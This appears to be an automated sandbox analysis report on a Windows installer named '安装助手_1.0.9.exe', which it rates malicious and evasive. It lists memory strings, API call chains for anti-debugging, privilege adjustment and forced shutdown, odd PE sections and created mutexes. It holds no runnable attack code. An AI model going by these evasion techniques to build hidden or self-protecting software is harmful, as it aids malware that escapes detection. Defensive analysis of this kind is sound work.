Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000003EF0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.6.dr, update.vac.1.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drString found in binary or memory: http://www.metalinker.org/
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drString found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drString found in binary or memory: https://aria2.github.io/
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drString found in binary or memory: https://aria2.github.io/Usage:
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drString found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000003.1793672185.0000000004399000.00000004.00001000.00020000.00000000.sdmp, is-B21TE.tmp.6.drString found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.1701537778.000000007F57B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.1700871640.00000000033E0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000000.1703739788.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000000.1796069280.000000000032D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.drString found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.1701537778.000000007F57B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.1700871640.00000000033E0000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000001.00000000.1703739788.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp, 00000006.00000000.1796069280.000000000032D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

barindex
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpProcess information set: 01 00 00 00 Jump to behavior

System Summary

barindex
Source: update.vac.1.drStatic PE information: section name: .=~
Source: update.vac.6.drStatic PE information: section name: .=~
Source: hrsw.vbc.6.drStatic PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6BFE3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BFE3886
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C165120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,6_2_6C165120
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C165D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6C165D60
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6BFE3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BFE3A6A
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6BFE39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BFE39CF
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6BFE3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BFE3D62
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6BFE3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BFE3D18
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6BFE3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,6_2_6BFE3C62
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6BFE1950: CreateFileA,DeviceIoControl,CloseHandle,6_2_6BFE1950
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6BFE4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,6_2_6BFE4754
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6BFF4A276_2_6BFF4A27
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6BFE47546_2_6BFE4754
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C1618806_2_6C161880
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C166A436_2_6C166A43
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C1C6CE06_2_6C1C6CE0
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C213D506_2_6C213D50
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C219E806_2_6C219E80
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C198EA16_2_6C198EA1
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C1B2EC96_2_6C1B2EC9
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C20E8106_2_6C20E810
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C22A9306_2_6C22A930
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C1989726_2_6C198972
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C2199F06_2_6C2199F0
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C20FA506_2_6C20FA50
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C211AA06_2_6C211AA0
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C224AA06_2_6C224AA0
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C20DAD06_2_6C20DAD0
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C1B0B666_2_6C1B0B66
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C1A0BCA6_2_6C1A0BCA
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C1B540A6_2_6C1B540A
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C2125806_2_6C212580
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C21F5C06_2_6C21F5C0
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C2196E06_2_6C2196E0
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C2397006_2_6C239700
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C19C7CF6_2_6C19C7CF
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C2100206_2_6C210020
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C2237506_2_6C223750
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A381EC10_2_00A381EC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A0E00A10_2_00A0E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A781C010_2_00A781C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A722E010_2_00A722E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A8824010_2_00A88240
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A8C3C010_2_00A8C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A9230010_2_00A92300
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A5E49F10_2_00A5E49F
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A804C810_2_00A804C8
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A725F010_2_00A725F0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A6A6A010_2_00A6A6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A666D010_2_00A666D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A6865010_2_00A68650
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A8E99010_2_00A8E990
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A4094310_2_00A40943
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A6C95010_2_00A6C950
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A72A8010_2_00A72A80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A4AB1110_2_00A4AB11
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A76CE010_2_00A76CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A68C2010_2_00A68C20
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A84EA010_2_00A84EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A80E0010_2_00A80E00
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A510AC10_2_00A510AC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A7D08910_2_00A7D089
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A6B18010_2_00A6B180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A7518010_2_00A75180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A891C010_2_00A891C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A6D1D010_2_00A6D1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A5B12110_2_00A5B121
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A8112010_2_00A81120
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A8D2C010_2_00A8D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A8720010_2_00A87200
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A7F3A010_2_00A7F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A1B3E410_2_00A1B3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_009F53CF10_2_009F53CF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A553F310_2_00A553F3
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A8F3C010_2_00A8F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A3D49610_2_00A3D496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A854D010_2_00A854D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A7F42010_2_00A7F420
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A6741010_2_00A67410
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A8D47010_2_00A8D470
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A8F59910_2_00A8F599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A8353010_2_00A83530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A6F50010_2_00A6F500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A9351A10_2_00A9351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_009F157210_2_009F1572
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A8155010_2_00A81550
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A7D6A010_2_00A7D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A9360110_2_00A93601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A4965210_2_00A49652
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_009F97CA10_2_009F97CA
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A877C010_2_00A877C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A0976610_2_00A09766
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A1F8E010_2_00A1F8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A8D9E010_2_00A8D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A6F91010_2_00A6F910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_009F1AA110_2_009F1AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A43AEF10_2_00A43AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A77AF010_2_00A77AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A0BAC910_2_00A0BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A0BC9210_2_00A0BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A77C5010_2_00A77C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A6FDF010_2_00A6FDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A75E8010_2_00A75E80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A75F8010_2_00A75F80
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: String function: 6C199240 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: String function: 6C236F10 appears 415 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 009F28E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 009F1E40 appears 83 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00A8FB10 appears 720 times
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.tmp.5.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.1701537778.000000007F87A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.9.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000000.1698759203.0000000000769000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.9.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, 00000000.00000003.1700871640.00000000034FE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.9.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeBinary or memory string: OriginalFileNameSSRClient.exe vs #U5b89#U88c5#U52a9#U624b_1.0.9.exe
Source: #U5b89#U88c5#U52a9#U624b_1.0.9.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.drBinary string: \Device\TfSysMon
Source: tProtect.dll.12.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal80.evad.winEXE@146/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C165D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,6_2_6C165D60
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_009F9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_009F9313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00A03D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00A03D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_009F9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,10_2_009F9252
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpCode function: 6_2_6C165240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,6_2_6C165240
Source: C:\Users\user\AppData\Local\Temp\is-2NRBA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmpFile created: C:\Program Files (x86)\Windows NT\is-A5GFB.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5472:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7824:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8144:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5768:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7744:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7988:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7720:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7708:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7488:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4296:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2692:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5432:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5164:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4624:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7764:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7996:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8072:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8148:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4040:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:984:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:332:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7332:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5100:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:180:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2588:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7932:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7752:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7944:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeFile created: C:\Users\user\AppData\Local\Temp\is-NO5VA.tmpJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_1.0.9.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
